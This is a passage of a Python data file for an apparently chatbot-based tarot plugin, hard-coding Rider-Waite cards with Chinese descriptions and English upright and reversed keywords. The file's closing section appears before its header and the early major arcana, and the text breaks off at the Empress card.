desc='宝剑骑士暗示要达成愿望需要有敏捷的行动。\n\n宝剑骑士代表的是迅速的行动:跃进或跳出某种情景。作为某个问题的答案,它暗示着一个快速的动作或出其不意的行为是有需要的。已经没有时间去想该做何选择了——去做就对了。\n\n这张牌通常是代表一个年轻人,他不按牌理出牌、缺少耐心、思考敏捷。这是属于年轻人的力量,他要走往自己的道路。是一种英勇的行径或者说英雄气概的展现。当然这种冲撞的行动,也可能极具破坏力,能造成摧毁的状况。他的意志力坚强,专注而犀利,有着清明的勇气和专一凝聚的心志。', upright='Action, Impulsiveness, Defending beliefs, Assertive, Direct, Impatient, Intellectual, Daring, Focused, Perfectionist, Ambitious', reversed='No direction, Disregard for consequences, Unpredictability, Rude, Tactless, Forceful, Bully, Aggressive, Vicious, Ruthless, Arrogant' ), init=False) queen_of_swords: TarotCard = field(default=TarotCard( id=62, index='queen_of_swords', type='minor_arcana', orig_name='Queen of Swords', name='宝剑皇后', intro='宝剑皇后戴著蝴蝶花纹的王冠,象征灵魂,也象征风要素。她穿着灰色内袍,和蓝天灰云花纹的披风。她的表情坚毅,似乎皱著眉头,左手却对世界敞开。她右手高举宝剑,剑尖笔直向上。她的宝座扶手之下有个人头花纹,那是风之精灵,宝座的底部又有蝴蝶花纹。宝剑皇后的头顶上有只高飞的鸟。背景天空是深蓝色的,还有大片的灰云。', words='理智', desc='宝剑皇后代表淡定冷静,经过深思熟虑所得到的成就。\n\n宝剑皇后是一张思索感情的牌。它可能意味运用心智到情感中的行动,好让感觉有意义。作为某个问题的答案,宝剑皇后暗示透过清晰思考而获致成功。\n\n现在正是你反省过去的行为或目前情况的时刻了。密切的观察那些接近你的事物,以确认你不会再重陷困境中。你可能会想从生活当中撤退,好好的思考你自己,以及未来的方向。', upright='Complexity, Perceptiveness, Clear mindedness, Honest, Independent, Principled, Fair, Constructive criticism, Objective, Perceptive', reversed='Cold hearted, Cruel, Bitterness, Pessimistic, Malicious, Manipulative, Harsh, Bitter, Spiteful, Deceitful, Unforgiving' ), init=False) king_of_swords: TarotCard = field(default=TarotCard( id=63, index='king_of_swords', type='minor_arcana', orig_name='King of Swords', name='宝剑国王', intro='宝剑国王是四张国王牌中唯一以正面出现的。他穿著蓝色内袍和红色披风,他的右手持剑,剑尖偏右,偏向行动的那一边。左手戴着象征权力的戒指,轻松的放在腿上。他后方帷幕上饰有象征灵魂和风要素的蝴蝶花纹。天空中的鸟的数量有两只,象征在智慧与行动之间的选择,对宝剑国王而言,智慧必须用行动来实现。', words='公正', desc='宝剑国王暗示将梦想化为现实,用构想去做一些真实的事。\n\n宝剑国王是客观理性,凡事讲求合理和公正,具有坚定而一贯的信念和完整的思想体系,很难被他人所影响。他凭借事实和原则而下决定,不会情感用事或主观成见,并且会考虑得十分周到,显出谨慎和深沉的特色。\n\n宝剑象征着人的思想和决心,这位国王手执宝剑,自然具有着掌握思考的能力,并且很重视理念和原则,在意的是合理与正义。宝剑国王代表对清楚的思想的追求、诚实,以及将只是倒入现实的需求。作为某个问题的答案,这张国王牌可以说是透过清楚而有效之计划而达到成功。', upright='Head over heart, Discipline, Truth, Reason, Authority, Integrity, Morality, Serious, High standards, Strict', reversed='Manipulative, Cruel, Weakness, Irrational, Dictator, Oppressive, Inhumane, Controlling, Cold, Ruthless, Dishonest' ), init=False) ace_of_pentacles: TarotCard = field(default=TarotCard( id=64, index='ace_of_pentacles', type='minor_arcana', orig_name='Ace of Pentacles', name='星币首牌', intro='云中伸出一只手,捧着一枚星币。背景是花草满布的繁盛庭园,绿树拱门外的远方有座白色的山,暗示星币一不只有关物质,也可以延伸到精神层面。', words='物质', desc='星币首牌暗示,你有足够的钱好执行你的计划。\n\n星币首牌是张将梦想化为实质的牌。圣杯牌组中,我们有梦﹔星币牌组中,我们筑梦,梦想不再只是空中楼阁。星币首牌让我们稳健,踏实,有安全感。星币首牌和务实的开始有关。它意味你有足够的金钱、精力,或充分的条件,来开始一项新计划。它暗示你可以平衡掉花费。不论目前花掉了多少钱,赚回来的绝对够本。', upright='Opportunity, Prosperity, New venture, New opportunities, Resources, Abundance, Security, Stability, Manifestation', reversed='Lost opportunity, Missed chance, Bad investment, Missed chances, Scarcity, Deficiency, Instability, Stinginess, Bad investments' ), init=False) two_of_pentacles: TarotCard = field(default=TarotCard( id=65, index='two_of_pentacles', type='minor_arcana', orig_name='Two of Pentacles', name='星币二', intro='一个红衣装扮,头戴高帽,类似街头艺人的男子,正在耍弄两个星币,星币外围的带子形成8自形无限符号,魔术师和力量牌中也有这个符号。他背后的海面起伏剧烈,两艘船正在其上行驶。', words='两难', desc='星币二暗示与金钱有关的决定。\n\n星币二显示一个专注于钱财的人。此时他并没有重大的财务压力,只是要决定那张账单要先付而已。保持弹性,是星币二带给我们的另一个课题。除了随机应变的弹性,星币二也求取平衡。\n\n星币二描述着权衡各种机会的轻重,而这次它们是属于身体或物质的层面上。这象征着介于两个选择之间的决定。你有没有办法现在就抉择,或是再等一会儿会不会比较好呢?', upright='Balancing decisions, Priorities, Adapting to change, Balancing resources, Adaptation, Resourcefulness, Flexibility, Stretching resources', reversed='Loss of balance, Disorganized, Overwhelmed, Imbalance, Unorganized, Messiness, Chaos, Overextending' ), init=False) three_of_pentacles: TarotCard = field(default=TarotCard( id=66, index='three_of_pentacles', type='minor_arcana', orig_name='Three of Pentacles', name='星币三', intro='在一座修道院里头,有位雕刻师正在工作,旁边两位修道人拿着草图,似乎正在和雕刻师讨论工作的进度。', words='学习', desc='星币三暗示透过研究、学习,或者将构想付诸实现,而改善自身的境遇。\n\n这张牌代表扎根于稳固的基础上,建立某些具有持久价值的东西。也许你是在建造一栋房子,开始学习一个对你有助益的课程,或为稳固的两性关系或生意打基础。星币三对自我发展而言是张正面的牌。星币三表示去作某些将可以改善你环境事情的一段时间。它可能是开始一个课程、阅读书籍,或如果它是出现在事业的分析中,那就是你在工作当中学习拥有一个机会去建立某种具有永久价值的东西。\n\n星币三是一个鼓励,鼓励当事人不管在进行什么样的工作,都可以仔细计划,然后放手去做,因为他具备完成工作所需要的专业能力,他有充足的才干来达成手边任何任务。星币三的成功不是偶然,他不仅有专业能力,还实实在在的工作。', upright='Teamwork, Collaboration, Building, Shared goals, Apprenticeship, Effort, Pooling energy', reversed='Lack of teamwork, Disorganized, Group conflict, Lack of cohesion, Apathy, Poor motivation, Conflict, Ego, Competition' ), init=False) four_of_pentacles: TarotCard = field(default=TarotCard( id=67, index='four_of_pentacles', type='minor_arcana', orig_name='Four of Pentacles', name='星币四', intro='图中的男人戴着皇冠,身穿象征统治威权的红色袍子,下摆饰以蓝边,显示出崇高的领主身分。他坐在一个箱子上,头顶一枚星币,双手紧抓着另一枚,双脚又各踩着两枚,紧张的神情似乎深怕他失去任何一丁点财产。这个人虽有钱,却孤绝于城市人群之外。', words='节约', desc='星币四意味厚积薄发,节省你的金钱或体能以迎接更大的挑战。\n\n星币四正位置常代表物质上的获利与稳定,获利的来源可能是工作,也可能是接受赠与或遗产。然而,星币四代表物质上的稳定,却不保证心灵上的成长。星币四意味你正在节约金钱、节省精力,或是节制。它也可能意味经由节约金钱、偿还债务及量入为出,而是你的财务状况日趋稳定。或许你在设计增加收入或减少指出,以确保自己进来的钱比出去的多。', upright='Conservation, Frugality, Security, Possessiveness, Insecurity, Hoarding, Stinginess, Stability, Savings, Materialism, Wealth, Boundaries, Guardedness', reversed='Greediness, Stinginess, Possessiveness, Generosity, Giving, Spending, Openness, Financial insecurity, Reckless spending' ), init=False) five_of_pentacles: TarotCard = field(default=TarotCard( id=68, index='five_of_pentacles', type='minor_arcana', orig_name='Five of Pentacles', name='星币五', intro='冰天雪地中,两个乞丐蹒跚前行,又瘸又驼背,身上的衣服破烂不堪。他们经过一间象征物质与精神庇护的教堂,却视而不见,挺着饥饿且疲惫的身躯,径自赶路。', words='困难', desc='星币五意味对那些充实你的事物的疏离感。\n\n卡面上的两个人本可以选择如何去发现、跟随及落实精神之路。教堂其实只是他们的一种选择。它代表把精神价值介绍给那些无意去追求的人。在五这张牌中,这些人没有看见它,因此丧失了一个改变的机会。外在悲惨是内在悲惨的一种反映,所以当星币五出现时,你需要接受生命提供给你的改变机会。“如果你想改变这个世界,请先改变你自己”是这张牌的答案。\n\n就整体观点来看,星币五说的是财务上的困难、贫穷、疾病和内在的寂寞。在不断的挣扎当中,你很容易窄化你对问题的焦点,而忽略了你的机会。当这张五出现时,深度的心灵改变是有其需要的,否则虽然有外在的助力,可能还是解决不了你的问题。你目前的人生观并非你的支柱,而现在你必须问自己,是否仍愿意保有这些信念。', upright='Need, Poverty, Insecurity, Hardship, Loss, Isolation, Feeling abandoned, Adversity, Struggle, Unemployment, Alienation, Disgrace', reversed='Recovery, Charity, Improvement, Positive changes, Recovery from loss, Overcoming adversity, Forgiveness, Feeling welcomed' ), init=False) six_of_pentacles: TarotCard = field(default=TarotCard( id=69, index='six_of_pentacles', type='minor_arcana', orig_name='Six of Pentacles', name='星币六', intro='一个商人装扮的男子,脚边跪着两个乞丐。商人右手施舍其中一名乞丐,左手拿着象征平衡的天秤。', words='施舍', desc='星币六暗示没有绝对的公平,其中一人比另一人更有控制力。\n\n星币六是在形容一种结构性的关系,其中一人比另一人更有控制力。是一张有很多层面的牌,而它的意义又会随着问题或周遭的牌而改变,在这张牌中,看似公平和正当,不过,请注意,两个乞丐是跪在富翁的面前。在这个关系里,他是处于有权力的地位。星币六是在形容一种关系:一个人支配另外一个人。\n\n跪在地上的人事实上是受制于他的,暗示着局面是由他所控制,而他是透过他的财富来掌控这一切。这个站着的人深谙拥有金钱就是拥有权力。他就越能选择自己的人生。施与受中间不只是金钱,知识、经验、技术的传授也算。所以星币六也代表知识、经验、技术的传授或是学习。', upright='Charity, Generosity, Sharing, Community, Material help, Support, Giving and receiving, Gratitude', reversed='Strings attached, Stinginess, Power and domination, Power dynamics, Abuse of generosity, Strings attached gifts, Inequality, Extortion' ), init=False) seven_of_pentacles: TarotCard = field(default=TarotCard( id=70, index='seven_of_pentacles', type='minor_arcana', orig_name='Seven of Pentacles', name='星币七', intro='一位农夫把下巴架在杖上,低头看着他长久辛勤得来的收成。这丛农作物在他的耕耘下,已经可以自己成长茁壮了。农夫的表情似乎很满足,又彷佛在思考下一步该怎么做。', words='规划', desc='星币七意味着思考未来的财务或物质状况。\n\n星币七暗示目前工作即将完结,只剩下一点尾巴要收而已。经历过去长时间段孜孜不倦的努力,现在可以暂停一下,看看自己目前的成就,想想下一步的行止。星币七是一种实际面上的投资与等待,并且具有时间性,能解释出过去和未来的现象。代表过去曾经付出努力,投注了资源和精神,如今正在等待成果,未来也将有机运得到这些回收。处于一种回顾和期待的状态。\n\n星币七代表思考和计划未来的一段时间。你的生活或目前的状况尚称平稳,所以你有时间可以安静的计划未来的步骤。这可能包括进一步的学习、强调休闲、谨慎地经营现有财物,甚至再创另一种事业,以补充现有的事业。花些时间多做思考吧,因为你的决定有可能对将来产生很大的影响。', upright='Hard work, Perseverance, Diligence, Harvest, Rewards, Results, Growth, Progress, Patience, Planning', reversed='Work without results, Distractions, Lack of rewards, Unfinished work, Procrastination, Low effort, Waste, Lack of growth, Setbacks, Impatience, Lack of reward' ), init=False) eight_of_pentacles: TarotCard = field(default=TarotCard( id=71, index='eight_of_pentacles', type='minor_arcana', orig_name='Eight of Pentacles', name='星币八', intro='一位雕刻匠坐在长板凳上,专注而勤劳地刻着星币星币,他前面已经完成六个了,脚边还有一个未完成。有一条黄色的道路连接远方的市镇与雕刻匠,连接工作与社会,无论什么工作,目的都是服务人群,雕刻匠并未忘记这一点。', words='上进', desc='星币八暗示对某人或某种状况的承诺。\n\n星币八是代表工作赚钱的一张牌,也表示能够累积财富,集中心力在赚取金钱上。这是一张代表承诺并专注于眼前工作的牌,而意念当中这乃是为了较长的目标而努力。\n\n星币八暗示对一个人或一种状况的深度承诺。现在你则着重于你的技巧以及如何变得更精炼。可以透过不懈的努力,或进一步的学习让技艺更上层楼。这张牌时说你已经在群体当中找到了自己的位置,并且在做适合你做的事情。你明白工作不应该是沉闷无味的,而是一种自我完成的机会。工作不仅只是为了填满你时间、胃或口袋,更重要的是让你的人生完整。', upright='Apprenticeship, Passion, High standards, Skill, Talent, Craftsmanship, Quality, Expertise, Mastery, Commitment, Dedication, Accomplishment', reversed='Lack of passion, Uninspired, No motivation, Lack of quality, Rushed job, Bad reputation, Lack of motivation, Mediocrity, Laziness, Low skill, Dead-end job' ), init=False) nine_of_pentacles: TarotCard = field(default=TarotCard( id=72, index='nine_of_pentacles', type='minor_arcana', orig_name='Nine of Pentacles', name='星币九', intro='一位衣着华丽的女子站在她的庄园中,四周葡萄茂盛,正是收成时节。她右手扶在星币上,大拇指还扣着一根葡萄藤,左手则戴着白手套,让她的小鸟站在上面,小鸟的头部却被红布遮住了。', words='自律', desc='星币九代表收获与安逸,丰富的物质生活与相对应的束缚。\n\n星币九是一张代表自信或自我依赖的牌,那可说是要达到超凡成就的必要条件。你的自信如果在搭配上自律的话,那将使你在许多层面上获益。\n\n大体上来说,星币九形容由于过去的努力而带来的一种舒适的生活。星币九代表财富的成功与富足,显示对于生活实际投入的层面,并表达了物质与精神层面的相互关系。', upright='Fruits of labor, Rewards, Luxury, Rewarded efforts, Success, Achievement, Independence, Leisure, Material security, Self-sufficiency', reversed='Reckless spending, Living beyond means, False success, Being guarded, Material instability, Superficiality' ), init=False) ten_of_pentacles: TarotCard = field(default=TarotCard( id=73, index='ten_of_pentacles', type='minor_arcana', orig_name='Ten of Pentacles', name='星币十', intro='星币十的近景是一位老年人,他舒服的坐着,身旁围绕着两只狗。拱门外的市镇中有一对青年男女,似乎在讨论什么,还有一个小孩子。十个星币排列成生命之树的符号。', words='富裕', desc='星币十意味归于平静的物质上的成功。\n\n星币十意味物质上的成功,星币十画的是一个安稳而舒适的居家环境。从墙上盾形家徽看得出这是一个富裕而巩固的环境,这个家庭拥有能提供舒适物质环境的一切条件。那么,为什么每个人都没有面对着别人呢?这老人是坐着的,他的注意力放在动物们的身上,年轻人背对我们,而女人也没有面对他,却稍稍侧着脸继续和他谈话。小孩子被忽略了,这些人彼此之间也没有真正的关联。它们得到别人所渴望的物质世界,不过很显然这也使他们感到沉闷,并陷入公式化的生活中,一旦这种公式消失,将无所适从。\n\n星币十是整组牌可能性的充分显示。他缺乏权杖的热情、宝剑的理想以及圣杯牌的情感。在这里可以找到物质上的安全感和稳定,但也付出了代价。', upright='Legacy, Culmination, Inheritance, Roots, Family, Ancestry, Windfall, Foundations, Privilege, Affluence, Stability, Tradition', reversed='Fleeting success, Lack of stability, Lack of resources, Family disputes, Bankruptcy, Debt, Conflict over money, Instability, Breaking traditions' ), init=False) page_of_pentacles: TarotCard = field(default=TarotCard( id=74, index='page_of_pentacles', type='minor_arcana', orig_name='Page of Pentacles', name='星币侍从', intro='星币待从双脚坚稳的站立在地面上,高高捧着星币,他所着迷的东西,在眼前仔细地观察着。他头戴红色软帽头饰,带子围着肩颈。身上的穿着是以棕色为底,套着绿色的外衣,鞋子和腰带也是棕色的。他站在青葱且长满花朵的草地上,远方有茂密的树丛,画面的右下还有一座山。', words='勤奋', desc='星币侍从意味着为理想而努力学习。\n\n星币侍从象征有关金钱、新工作或学习一门课程的消息。它可以表示去学习某些将会产生实质效益的事物。这个侍从通常代表学生的勤奋向学。透过学习一门课程,或于工作中学习,发挥了自己的能力。有时候这个侍从可能暗示你对于正在学习的科目,变得更专注,甚至更重视学习的成果。', upright='Ambition, Desire, Diligence, Ambitious, Diligent, Goal oriented, Planner, Consistent, Star student, Studious, Grounded, Loyal, Faithful, Dependable', reversed='Lack of commitment, Greediness, Laziness, Foolish, Immature, Irresponsible, Lazy, Underachiever, Procrastinator, Missed chances, Poor prospects' ), init=False) knight_of_pentacles: TarotCard = field(default=TarotCard( id=75, index='knight_of_pentacles', type='minor_arcana', orig_name='Knight of Pentacles', name='星币骑士', intro='星币骑士笔直地坐在黑马背上,仔细打量手上的星币。黑色的强壮马匹配着厚实的红色马鞍和缰绳,侧面垂着红色的软坐垫,牢牢地站在地面,是四张骑士牌中唯一不动的座骑。骑士戴着头盔,头盔顶端饰有穗状的绿叶,黑马的头顶也有相同的叶穗。他身着厚重盔甲,外披一件暗红色战袍,也戴着红色的手套。星币骑士处于空旷的大地上,眼前应是一望无际。远方的地面是一片经过细心耕耘的田地,背景是一片鲜黄色。', words='稳健', desc='星币骑士代表稳健而认真的计划。\n\n星币骑士通常指的是强化你的计划,并朝确定的目标迈进。它意味着为了实现一个目标而努力工作。就一个人而言,这个人对于承诺非常的认真,不论是对事业、个人雄心或两性关系。通常,他相信这个格言:“如果你想做好一件事,那就自己动手吧。”', upright='Efficiency, Hard work, Responsibility, Practical, Reliable, Efficient, Stoic, Slow and steady, Hard-working, Committed, Patient, Conservative', reversed='Laziness, Obsessiveness, Work without reward, Workaholic, Dull, Boring, No initiative, Cheap, Irresponsible, Gambler, Risky investments' ), init=False) queen_of_pentacles: TarotCard = field(default=TarotCard( id=76, index='queen_of_pentacles', type='minor_arcana', orig_name='Queen of Pentacles', name='星币皇后', intro='星币皇后的面貌端庄而正直,双手捧着星币,并低头凝望着星币,神情若有所思。她的后冠是圆顶的,中间有插着两根红色羽毛,星币皇后的后袍是红色的,内衫露出的袖子是白色的,是红白对立的组合,绿色的披风由头上往下延伸到椅上。皇后的宝座处在长满丰盛植物的平原上,在茂密的林荫中,玫瑰花围绕成的拱门之下,所在的草地之上盛开着多株玫瑰花,。座椅是精工雕琢的,刻满了纹饰。有许多植物和天使的图案,很像圣杯皇后的座椅,扶前端有羊头的浮雕,椅侧有小孩的浮雕,椅背刻满了藤蔓瓜叶。宝座旁的近景是一片肥沃的土地,满是绿草和花朵。', words='安定', desc='星币皇后意味着喜爱大自然,又有良好的商业眼光。\n\n从一般观点来看,星币皇后是一张代表信任自己能力的牌。她意味经由深思熟虑而带来成功。作为一个人,星币皇后通常有着敏锐的生意眼光,而且总是喜欢存点钱在身边,好让自己有安全感。在有需要的时候她会很节俭,而且不会任意炫耀财富。她是一个可靠、实际的人,知道应该在那里下功夫可以得到最大的成功。\n\n这张皇后牌是指务实、可靠,并擅长喂养植物和动物。她也喜欢经常到乡间旅行,或漫步于大自然中,因为她需要和自然保持接触,让生命有完整而踏实的感觉。', upright='Practicality, Creature comforts, Financial security, Generous, Caring, Nurturing, Homebody, Good business sense, Practical, Comforting, Welcoming, Sensible, Luxurious', reversed='Self-centeredness, Jealousy, Smothering, Selfish, Unkempt, Jealous, Insecure, Greedy, Materialistic, Gold digger, Intolerant, Self-absorbed, Envious' ), init=False) king_of_pentacles: TarotCard = field(default=TarotCard( id=77, index='king_of_pentacles', type='minor_arcana', orig_name='King of Pentacles', name='星币国王', intro='星币国王悠然自得的坐在他的花园里。他的左手拿着星币,右手拿着权杖,姿态轻松。花围中长满象征丰收成果的葡萄和各种植物,他的服装也满是葡萄图案,整个人似乎与大自然融成一体。宝座上有牛头图案,是星币的家族图腾。国王的右手靠在座椅的扶手上,掌中握着宝球权柄。左手持拥五芒星金币,并垫起左脚让这枚大金币更稳定确实地置于膝上。国王慵懒地靠在椅背上,低眼安然地端详着他的金币。', words='坚定', desc='星币国王表示务实而坚定的态度可以带来成功。\n\n星币国王暗示透过身体力行而达到成功。它也可以说是务实的努力带来物质上的成功。星币国王代表的是一个脚踏实地而又成熟的人。他的个性稳健、可靠且保守,并能努力履行其承诺,谨慎的负起他应负的责任。他不像权杖国王般富冒险精神,或像圣杯国王那么有创意,但他可凭藉着慢慢而稳定的步伐,以及认真的实践来达到成功。', upright='Abundance, Prosperity, Security, Ambitious, Safe, Kind, Patriarchal, Protective, Businessman, Provider, Sensual, Reliable', reversed='Greed, Indulgence, Sensuality, Materialistic, Wasteful, Chauvanist, Poor financial decisions, Gambler, Exploitative, Possessive' ), init=False) class TarotPacks(object): """ 定义套牌 """ SpecialCard: TarotPack = TarotPack( name='special', cards=[card for card in TarotCards.get_all_cards() if card.type == 'special']) MajorArcana: TarotPack = TarotPack( name='major_arcana', cards=[card for card in TarotCards.get_all_cards() if card.type == 'major_arcana']) MinorArcana: TarotPack = TarotPack( name='minor_arcana', cards=[card for card in TarotCards.get_all_cards() if card.type == 'minor_arcana']) RiderWaite: TarotPack = TarotPack( name='rider_waite', cards=[card for card in TarotCards.get_all_cards() if ( card.type == 'major_arcana' or card.type == 'minor_arcana')]) __all__ = [ 'TarotCards', 'TarotPacks' ]
""" @Author : Ailitonia @Date : 2021/08/31 21:24 @FileName : tarot_data.py @Project : nonebot2_miya @Description : 塔罗卡牌及卡组数据 虽然这里看起来使用 json 会更好 但还是用 dataclass 硬编码了:( @GitHub : https://github.com/Ailitonia @Software : PyCharm """ from typing import List from dataclasses import dataclass, field, fields from .tarot_typing import Element, Constellation, TarotCard, TarotPack @dataclass class Elements: earth: Element = field(default=Element(id=0, orig_name='Earth', name='土元素'), init=False) water: Element = field(default=Element(id=0, orig_name='Water', name='水元素'), init=False) air: Element = field(default=Element(id=0, orig_name='Air', name='风元素'), init=False) fire: Element = field(default=Element(id=0, orig_name='Fire', name='火元素'), init=False) aether: Element = field(default=Element(id=0, orig_name='Aether', name='以太'), init=False) @dataclass class Constellations: pluto: Constellation = field(default=Element(id=-9, orig_name='Pluto', name='冥王星'), init=False) neptunus: Constellation = field(default=Element(id=-8, orig_name='Neptunus', name='海王星'), init=False) uranus: Constellation = field(default=Element(id=-7, orig_name='Uranus', name='天王星'), init=False) saturn: Constellation = field(default=Element(id=-6, orig_name='Saturn', name='土星'), init=False) jupiter: Constellation = field(default=Element(id=-5, orig_name='Jupiter', name='木星'), init=False) mars: Constellation = field(default=Element(id=-4, orig_name='Mars', name='火星'), init=False) earth: Constellation = field(default=Element(id=-3, orig_name='Earth', name='地球'), init=False) moon: Constellation = field(default=Element(id=-10, orig_name='Moon', name='月亮'), init=False) venus: Constellation = field(default=Element(id=-2, orig_name='Venus', name='金星'), init=False) mercury: Constellation = field(default=Element(id=-1, orig_name='Mercury', name='水星'), init=False) sun: Constellation = field(default=Element(id=0, orig_name='Sun', name='太阳'), init=False) aries: Constellation = field(default=Element(id=1, orig_name='Aries', name='白羊座'), init=False) taurus: Constellation = field(default=Element(id=2, orig_name='Taurus', name='金牛座'), init=False) gemini: Constellation = field(default=Element(id=3, orig_name='Gemini', name='双子座'), init=False) cancer: Constellation = field(default=Element(id=4, orig_name='Cancer', name='巨蟹座'), init=False) leo: Constellation = field(default=Element(id=5, orig_name='Leo', name='狮子座'), init=False) virgo: Constellation = field(default=Element(id=6, orig_name='Virgo', name='室女座'), init=False) libra: Constellation = field(default=Element(id=7, orig_name='Libra', name='天秤座'), init=False) scorpio: Constellation = field(default=Element(id=8, orig_name='Scorpio', name='天蝎座'), init=False) sagittarius: Constellation = field(default=Element(id=9, orig_name='Sagittarius', name='人马座'), init=False) capricorn: Constellation = field(default=Element(id=10, orig_name='Capricorn', name='摩羯座'), init=False) aquarius: Constellation = field(default=Element(id=11, orig_name='Aquarius', name='宝瓶座'), init=False) pisces: Constellation = field(default=Element(id=12, orig_name='Pisces', name='双鱼座'), init=False) @dataclass class TarotCards: """ 所有卡牌 每个属性都是一张牌 """ @classmethod def get_all_cards(cls) -> List[TarotCard]: """ 获取所有塔罗牌的列表 :return: List[TarotCard] """ return [field_.default for field_ in fields(cls) if field_.type == TarotCard] blank: TarotCard = field(default=TarotCard( id=-1, index='blank', type='special', orig_name='Blank', name='空白', intro='空白的卡面,似乎可以用来作为卡牌背面图案使用', words='', desc='', upright='', reversed='' ), init=False) the_fool: TarotCard = field(default=TarotCard( id=0, index='the_fool', type='major_arcana', orig_name='The Fool', name='愚者', intro='愚人穿着色彩斑斓的服装,头上戴顶象征成功的桂冠,无视于前方的悬崖,昂首阔步向前行。\n\n他左手拿着一朵白玫瑰,白色象征纯洁,玫瑰象征热情。他的右手则轻轻握着一根杖,象征经验的包袱即系于其上。那根杖可不是普通的杖,它是一根权杖,象征力量。愚人脚边有只小白狗正狂吠着,似乎在提醒他要悬崖勒马,又好像随他一同起舞。无论如何,愚人仍旧保持着欢欣的神色,望向遥远的天空而非眼前的悬崖,好像悬崖下会有个天使扥住他似的,他就这样昂首阔步地向前走。远方的山脉象征他前方未知的旅程,白色的太阳自始至终都目睹着愚人的一举一动──他从哪里来?他往何处去?他又如何回来?', words='流浪', desc='愚人牌暗示着你现在不顾风险而有所行动。\n\n愚人是一张代表自发性行为的牌,一段跳脱某种状态的日子,或尽情享受眼前日子的一段时光。对旅游而言,这是一张积极的牌,暗示你将会活在当下,并且会有和生命紧密结合的感觉。“每天都充实,乐趣便在其中”是一句很适合这张牌的古谚语。当你周遭的人都对某事提防戒慎,你却打算去冒这个险时,愚人牌可能就会出现。\n\n愚人暗示通往满足之路是经由自发的行动,而长期的计划则是将来的事。', upright='盲目的、有勇气的、超越世俗的、展开新的阶段、有新的机会、追求自我的理想、展开一段旅行、超乎常人的勇气、漠视道德舆论的。', reversed='过于盲目、不顾现实的、横冲直撞的、拒绝负担责任的、违背常理的、逃避的心态、一段危险的旅程、想法如孩童般天真幼稚的。' ), init=False) the_magician: TarotCard = field(default=TarotCard( id=1, index='the_magician', type='major_arcana', orig_name='The Magician (I)', name='魔术师', intro='魔术师高举拿着权杖的右手指向天,左手食指指向地,他本人就是沟通上天与地面的桥梁。他身前的桌上放着象征四要素的权杖、圣杯、宝剑与星币,同时也代表塔罗牌的四个牌组。他身穿的大红袍子象征热情与主动,白色内衫表示纯洁与智慧的内在。缠绕他腰间的是一条青蛇,蛇虽然经常象征邪恶,但在这里代表的是智慧与启发。魔术师头顶上有个倒8符号,代表无限。画面前方和上方的红玫瑰象征热情,白百合象征智慧。此时,万事齐备,魔术师可以开始进行他的新计划了。和愚人牌同样鲜黄色的背景,预示未来成功的可能。', words='创造', desc='魔术牌意味着:现在是展开新计划的好时机。\n\n魔术师这张牌意味这是个着手新事物的适当时机。对的时间、对的机会、对的动机,使你的努力值回票价。对于展开行动、实现计划而言,这正是一个良好时机。由于你已为实现计划扎下良好基础,所以新的冒险很可能会实现。清楚的方向感和意志力的贯彻,大大的提升了成功的可能性。', upright='成功的、有实力的、聪明能干的、擅长沟通的、机智过人的、唯我独尊的、企划能力强的、透过更好的沟通而获得智慧、运用智慧影响他人、学习能力强的、有教育和学术上的能力、表达技巧良好的。', reversed='变魔术耍花招的、瞒骗的、失败的、狡猾的、善于谎言的、能力不足的、丧失信心的、以不正当手段获取认同的。' ), init=False) the_high_priestess: TarotCard = field(default=TarotCard( id=2, index='the_high_priestess', type='major_arcana', orig_name='The High Priestess (II)', name='女祭司', intro='相较于上一张魔术师纯粹阳性的力量,女祭司表现的则是纯粹阴性的力量。她身穿代表纯洁的白色内袍,与圣母的蓝色外袍,静默端坐。胸前挂个十字架,象征阴阳平衡、与神合一。\n\n她头戴的帽子是由上弦月、下弦月和一轮满月所构成的,象征所有的处女神祇。手上拿着滚动条,象征深奥的智慧,其上的TORA字样,意为“神圣律法”,而滚动条卷起并半遮着,暗示此律法不为人所知。在她脚边的一轮新月,为她的内袍衣角所固定住,袍子并延伸到图面之外。女祭司两侧一黑一白的柱子,存在于圣经故事中所罗门王在耶路撒冷所建的圣殿中,黑白柱上的B与J字样,分别是Boas和Jachin的缩写,黑柱是阴而白柱是阳,两柱象征二元性,坐在中间的女祭司则不偏不倚,统合两者的力量。柱子上面的喇叭造型,代表女祭司敏锐的感受性,上面的百合花纹则象征纯洁与和平。两柱之间有帷幕遮着,帷幕上的石榴代表“阴”,棕榈代表“阳”。帷幕把后方的景色遮住了,仔细一看,依稀可见由水、山丘与的蓝天构成的背景。水象征情感与潜意识,这一片水平静无波,但其静止的表面下蕴藏深沉的秘密。整个图面呈现象征智慧的蓝色调,双柱的意象在后面的牌中重复出现。', words='智慧', desc='女祭司意味着:这是向内探索、沉思,或按兵不动的时刻。\n\n女祭司代表去思考可以导致实际结果的构想。这并不是一张代表具体事物的牌,而是一张代表可能性的牌。我们每个人都在我们的人生当中持续的耕耘和收获,而女祭司就是散播那些种子或理念的行动。\n\n女祭司暗示你应该要相信你的直觉,因为在这一点上,有些东西你可能看不见。高位的女祭司是一张代表精神和心灵发展的牌。它代表了向内心探索的一段时期,以便为你人生的下一个阶段播种,或者去消化你在肉体的层次上所处理的事情。', upright='纯真无邪的、拥有直觉判断能力的、揭发真相的、运用潜意识的力量、掌握知识的、正确的判断、理性的思考、单恋的、精神上的恋爱、对爱情严苛的、回避爱情的、对学业有助益的。', reversed='冷酷无情的、无法正确思考的、错误的方向、迷信的、无理取闹的、情绪不安的、缺乏前瞻性的、严厉拒绝爱情的。' ), init=False) the_empress: TarotCard = field(default=TarotCard( id=3, index='the_empress', type='major_arcana', orig_name='The Empress (III)', name='女皇', intro='体态丰腴的皇后坐在宝座上,手持象征地球的圆形手杖,戴着由九颗珍珠组成的项链,象征九颗行星,也代表金星维纳斯。皇后头冠由十二个六角星组成,象征十二星座与一年的十二个月。更进一步,六角星本身是由一个正三角形和倒三角形组成,分别代表火要素和水要素。除了头冠之外,她还戴着香桃木叶作成的头环,象征金星维纳斯。她身穿的宽松袍子上面画满象征多产的石榴,宝座下方则是个绘有金星符号的心形枕头。她前方的麦田已经成熟,代表丰饶与多产;后方则是茂密的丝柏森林,与象征生命力的瀑布河流。', words='丰收', desc='女皇牌暗示家庭和谐及稳定。\n\n简单言之,女皇可能意味着实现计划,或朝向计划的下一个自然步骤迈进,亦即你又向目标靠近了一步。女皇牌也可能暗示一趟乡野之旅,或是休息一阵子并重返大自然的怀抱,因为她四周围绕着自然的产物。透过亲近自然,现在是你重新平衡自己的时候。这张牌意味家庭状态的稳定与和谐,而这通常是透过把爱从思考当中,带往内心来达成的。', 